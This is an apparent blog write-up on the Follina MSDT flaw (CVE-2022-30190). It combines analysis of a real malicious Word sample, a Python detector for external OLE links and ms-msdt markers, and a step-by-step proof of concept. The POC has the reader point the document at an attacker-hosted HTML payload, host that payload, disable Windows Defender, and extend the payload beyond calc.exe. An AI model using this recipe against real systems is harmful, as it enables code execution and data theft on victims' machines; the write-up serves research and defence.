Follina MSDT Vulnerability CVE-2022-30190: Analysis and POC
Brief on payload analysis, creating the malicious doc, triggering the exploit and the process flow
A short backstory
On 27 May 2022, nao_sec was searching VirusTotal for samples of CVE-2021-40444 (an earlier vulnerability that abuses the MSHTML engine to achieve remote code execution through a specially crafted Microsoft Office document). While doing so, he found a Microsoft Word document that, interestingly, used an external reference to load an HTML file; that HTML file then executed staged PowerShell code through the Microsoft Support Diagnostic Tool (MSDT), invoked via the ms-msdt URI scheme. Three days later, Microsoft issued CVE-2022-30190 for this MSDT vulnerability.
What now?
A remote code execution (RCE) vulnerability exists in MSDT: when MSDT is invoked from a Microsoft Word document, it allows malicious code to run without the user's permission. An attacker exploiting this vulnerability can run arbitrary code, escalate privileges, move laterally through the network, and view, edit or delete data. In short, when you open or preview an affected Word document, malicious code is executed by MSDT in the background, and the attacker ends up owning your system and your data.
Attack scenario:
The malicious Word document is delivered to the target (a phishing mail, to start with). Once the target opens the document and enables editing (prompted because the file arrived by mail or was downloaded from an external site), the exploit is triggered and the adversary gains full access to the target system, or the exploit performs other unintended malicious activities.
Some blue teaming!
Before we get into the POC, let us analyze the infected Microsoft Word document first shared by nao_sec, to understand what happens behind the scenes. The sample document can be obtained from app.any.run for some basic analysis.
Extracting the Word file (a .docx is a ZIP archive) reveals the components and structure of the document.
Inside word/_rels/document.xml.rels we find a Relationship entry that refers to an external HTML file: its Target attribute holds the URL of the HTML file, and TargetMode="External" marks it as an external link. The domain shown in the screenshot is offline now.
Now we shall analyze the contents of RDF842l.html, taken from app.any.run's process-flow tab. You can see the full code in my GitHub repo.
Here we see the usual HTML tags, followed by a script tag containing a long run of 'A's. This padding is there to push the payload size past the minimum of 4096 bytes needed to trigger the exploit: researchers have confirmed the buffer size used for HTML processing, and that the exploit is not invoked if the file is smaller than 4096 bytes.
At the bottom we have window.location.href, which points to the ms-msdt scheme. Here, msdt is used to invoke PCWDiagnostic. The IT_BrowseForFile parameter contains base64-encoded strings; let us decode them for analysis.
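As an added blue-team example (not code from the original post or from nao_sec's sample), the two checks above can be automated: scan a .docx package for an OLE relationship that points at an external http(s) URL, and look for the ms-msdt, PCWDiagnostic and IT_BrowseForFile markers plus the 4096-byte padding in a fetched HTML file. The sample document and HTML are constructed inline; the relationship namespace and OLE relationship type are the standard OOXML URIs.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"

def external_ole_links(docx_bytes):
    # A benign embedded OLE object resolves to embeddings/oleObjectN.bin inside the
    # package; the Follina sample instead has TargetMode="External" and an http(s) URL.
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for part in (n for n in z.namelist() if n.endswith(".rels")):
            root = ET.fromstring(z.read(part))
            for rel in root.iter("{%s}Relationship" % RELS_NS):
                target = rel.get("Target", "")
                if (rel.get("Type") == OLE_REL and rel.get("TargetMode") == "External"
                        and re.match(r"https?://", target, re.I)):
                    hits.append((part, rel.get("Id"), target))
    return hits

def html_stage_indicators(html):
    # Second-stage markers: ms-msdt: scheme, PCWDiagnostic, IT_BrowseForFile,
    # and padding that pushes the file past the 4096-byte threshold.
    low = html.lower()
    return {
        "ms_msdt_scheme": "ms-msdt:" in low,
        "pcwdiagnostic": "pcwdiagnostic" in low,
        "it_browseforfile": "it_browseforfile" in low,
        "padded_over_4096": len(html.encode("utf-8")) >= 4096,
    }

def build_sample_docx(target):
    # Constructed minimal package containing only the relationship part.
    rels = ('<?xml version="1.0" encoding="UTF-8"?><Relationships xmlns="%s">'
            '<Relationship Id="rId5" Type="%s" Target="%s" TargetMode="External"/>'
            '</Relationships>' % (RELS_NS, OLE_REL, target))
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()

# Constructed samples, not the real document or RDF842l.html.
SAMPLE_DOCX = build_sample_docx("http://example.invalid/payload.html!")
SAMPLE_HTML = ("<html><script>/*" + "A" * 4096 + "*/\n"
               'location.href = "ms-msdt:/id PCWDiagnostic /param IT_BrowseForFile=CONSTRUCTED";'
               "</script></html>")
```

Run external_ole_links over every .docx that arrives by mail and html_stage_indicators over any HTML that an external OLE link fetches; either hit on its own is worth an alert, and both together match the Follina chain.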
Here comes the interesting part!
- The path to cmd.exe is stored in a variable called "cmd".
- A cmd.exe process is started in hidden mode and kills any running msdt processes.
- It then recursively searches for the base64-encoded CAB file inside an archive named "05-2022-0438.rar", decodes and extracts the CAB file, and finally executes rgb.exe.
- rgb.exe is presumed to be malware that, once launched by the msdt process, gives the attacker remote access or performs other malicious or unintended tasks on the target.
The code inside the IT_BrowseForFile=h$() parameter contains the command that the attacker intends to execute. For the purpose of the POC, let us modify the contents of the IT_BrowseForFile=h$() parameter to spawn a calc.exe process.
Proof-Of-Concept (POC)
Let’s follow some steps to construct a POC to exploit this vulnerability for “education and research purposes”.
Step 1: Open a Word document, insert a Bitmap OLE object and save the document as samplePOC.docx.
Step 2: Open the document structure (I'm using 7-Zip).
Step 3: Edit the word/_rels/document.xml.rels file as follows. Find the Relationship XML tag with the attribute Target="embeddings/oleObject1.bin", change it to Target="http://<server-ip:server-port>/payload.html!" and additionally add TargetMode="External". Then save and acknowledge the modification.
Note: Specify the IP address and port of the server that is going to host the HTML payload file.
Step 4: Similarly, edit the word/document.xml file. In edit mode, search for OLEObject; near it, change the Type="Embed" attribute to Type="Link" and also add UpdateMode="OnCall". Once done, save and acknowledge the modification.
We have now created the malicious document, which can trigger the msdt process to execute the HTML payload hosted on our server. Next, let's configure the HTML payload file and host it. You can get the modified HTML payload file (calc.exe launcher) from my GitHub repo.
Now serve the HTML file. I use Python to host it.
So now the malicious document we crafted is sitting on the target PC and we have hosted the HTML payload on our server. If the target opens the crafted Word document, Microsoft Word invokes the msdt process, which fetches the hosted payload and executes it on the target PC. Let's simulate that by opening samplePOC.docx.
Note: Disable Windows Defender, as the recent update detects the exploit as Mesdetty.*
This concludes our POC.
This exploit can further be scoped to remote code execution, data theft, APT activity, etc., by modifying the commands inside IT_BrowseForFile=h$().
Additionally, adding the parameters shown in the screenshot under the <o:OLEObject> element in word/document.xml at step 4 produces an RTF version of the exploit. That variant is triggered as soon as the document is merely previewed in the preview pane.
A very quick look on the processes!
With the great help of Microsoft Sysinternals Process Explorer, we can see that WINWORD.EXE (Microsoft Office Word) creates an msdt.exe child process; sdiagnhost.exe then spawns a conhost.exe process, and Calculator.exe is spawned with sdiagnhost.exe as its parent.
Final Thoughts!
Now that Microsoft Defender detects and blocks CVE-2022-30190 as Mesdetty.*, disabling the MSDT URL protocol (which allows troubleshooters to be launched as links, including links throughout the operating system) should be on your checklist for defending against this vulnerability.
I couldn't find a better way to conclude this post. See you later! If you found this writeup helpful, leave some claps!
References:
https://www.youtube.com/watch?v=dGCOhORNKRk
https://www.youtube.com/watch?v=3ytqP1QvhUc
https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-30190